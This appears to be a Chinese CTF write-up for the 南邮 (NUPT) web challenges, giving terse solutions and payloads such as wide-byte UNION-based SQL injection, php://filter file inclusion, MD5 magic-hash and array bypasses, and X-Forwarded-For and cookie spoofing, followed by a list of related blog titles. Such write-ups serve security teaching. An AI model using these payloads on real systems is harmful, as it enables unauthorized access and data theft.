签到题

查看源码就可得到

md5 collision

Poc:a=240610708

%E6%90%9C%E7%8B%97%E6%88%AA%E5%9B%BE20160901180637.png

签到2

关键点:输入框设定了最大的长度限制

层层递进

在iframe标签属性都为0,查看链接,一直点下去发现404.html,16行-35行,getflag

AAencode

单身二十年

源码点击./search_key.php,getflag

你从哪里来

文件包含

Poc:file=php://filter/convert.base64-encode/resource=index.php

单身一百年也没用

点击到这里找key,查看响应头,getflag

Download~!

Poc:url=ZG93bmxvYWQucGhw

COOKIE

Cookie: Login=1

MYSQL

1、查看robots.txt

2、sql.php?id=1024.00001

sql injection 3

id=2,gbk

id=1%df’ union select 1,2 –+

id=1%df’ union select database(),2 –+

回显sqli

id=1%df’ union select 1,table_name from information_schema.tables where table_schema=0x73716C6931

回显 falg

id=1%df’ union select 1,cloumn_name from information_schema.columns where table_schema=0x73716C6931

回显 fl4g

id=1%df’ union select 1,fl4g from flag –+

/x00

Poc:nctf[]=1.#biubiubiu

bypass again

Poc:a[]=1&b[]=2

变量覆盖

POST:pass=123&thepassword_123=123

PHP是世界上最好的语言

Poc:id=%2568ackerDJ

伪装者

x-forwarded-for: 127.0.0.1

上传绕过

SQL注入1

admin’)#&111

pass check

输入123,抓包改为传入数组

起名字真难

Poc:key=0xccccccccc

mysql 南邮ctf_南邮ctf web相关推荐

  1. mysql 南邮ctf_南邮ctf之web之wp

    下面是所有现在可以做的web题的wp! 建议使用CTRL+F查找所需题目,我都有标注!这样方便! 1.签到题 直接查看源码即可 2.md5 collision 解读代码: $md51 = md5('Q ...

  2. mysql 南邮ctf_南邮CTF平台WEB题writeup

    https://cgctf.nuptsast.com/login 1.签到题 F12查看网页源代码就有flag 2.md5 collision 附上题目给的源代码md51 = md5('QNKCDZO ...

  3. mysql 南邮ctf_南邮ctf web题记录(上)

    1.签到题 f12看源码就行了. md5 collision 题目贴出了源码,按照题意,a不等于QNKCDZO但是md5与QNKCDZO的md5相等时就可以获得flag. 如果两个字符经MD5加密后的 ...

  4. 学计算机去南邮还是南信,南信大和南邮相比怎么样 南信大怎么样

    南信大和南邮相比怎么样,南京邮电大学简称南邮,南京信息工程大学简称南信大,都是南京的高校,那么南信大和南邮相比怎么样呢?南信大怎么样呢? 南信大和南邮相比怎么样 南信大,坐落于南京江北新区,全称为南京 ...

  5. 南邮计算机考研太难,南京邮电大学的学生要考研到清华的话,有多困难?(南理工、南邮计算机考研近五年分数线复试录取比例各多少?)...

    南京邮电大学考研计算机专业分数线 南邮网站上都有 复试线:信息安全300 计算机系统结构300 计算机软件与理论300 计算机应用技术295 软件工程300 计算机技术(专硕)310 软件工程(专硕) ...

  6. CTF Web方向考点总结

    CTF Web 0X00 前言 做题已经快四个月了,接触了大大小小的题型,收藏的大师傅们的解题思路.题型总结的博客已经很多了,每次都要一个一个翻很麻烦,于是写下了这一个总结,实际上是把各大博客内容汇总 ...

  7. CTF——web个人总结

    CTF web个人总结 仅供个人参考 从0开始接触到了CTF,算是入门了,为了方便自己做题,现在记录一下web类型题目的解题思路. 目录 CTF web个人总结 工具(含后渗透) 解题思路 一.普通思 ...

  8. ctf web必备工具_设计人员和开发人员的必备Web工具和服务

    ctf web必备工具 I cannot imagine that in 2018 there are people who don't use daily several web tools and ...

  9. CTF Web入门 命令执行 笔记

    CTF Web入门 命令执行 eval(读取命令),但各种字符被ban if(!pregmatch("...",$c)) #指过滤了...eval($c); 这时候可以尝试 ?c= ...

最新文章

  1. 通过身份证号提取性别_身份证号提取生日、年龄、性别、籍贯,最简单的方法!...
  2. ordfilt2函数功能说明
  3. MariaDB AX开源分析解决方案
  4. java源码搭建教程_CentOS 7 搭建源码包搭建LNMP环境
  5. 南京大学计算机科学系照片,欧拉图-南京大学计算机科学与技术系.pdf
  6. Kubernetes中分布式存储Rook-Ceph的使用:一个ASP.NET Core MVC的案例
  7. 从基于Maven的Web应用程序获取版本字符串
  8. Nagios显示器mysql定从库: libmysqlclient.so.18: cannot open shared object file: No such
  9. 美团搜索-搜索引擎关键字智能提示的一种实现[转]
  10. 苹果电脑java如何降级,如何在Mac OSX上降级JRE / JDK?
  11. UI设计师分析用户的常用方法
  12. —— GPS测量原理及应用复习-1 ——
  13. 微波射频工程师必读经典参考书
  14. 声明一个长方形类,属性有长和宽;操作有赋值、计算长方形的周长和面积、输出信息等,要求定义构造函数(缺省值为10)和析构函数。
  15. C#一年级100以内的加减训练
  16. CSS3背景(background-size、background-origin、background-clip)圆角
  17. Glide加载网络图片模糊变形问题解决办法
  18. Python 于 webgame 的应用(上)
  19. 剑灵服务器人数最多,2020剑灵服务器人数排名,剑灵哪个服务器人多
  20. win8(四)实例讲解win8(XAML+C#)开发--------课程表:Snapped模式和动态磁贴,徽章(badge)

热门文章

  1. 用 .Net WebBrowser 控件获取POST数据
  2. 解决oracle语句中 含数字的字符串按数字排序问题
  3. Windows 2008 IIS7.5中创建独立账号的FTP站点图文教程
  4. SpringBoot图文教程9—SpringBoot 导入导出 Excel 「Apache Poi」(亲测)
  5. RuntimeError at /admin 解决办法(亲测)
  6. php xdebug安装配置与调试php技巧
  7. quartz定时器依赖_Grails集成Quartz插件实现定时任务(Job)
  8. fiddler设置中文版本_教你下载iOS老版本应用
  9. c语言作业做出金山打字功能,goldmountain.c
  10. mysql global temporary table_【转】MySQL Temporary Table相关问题的探究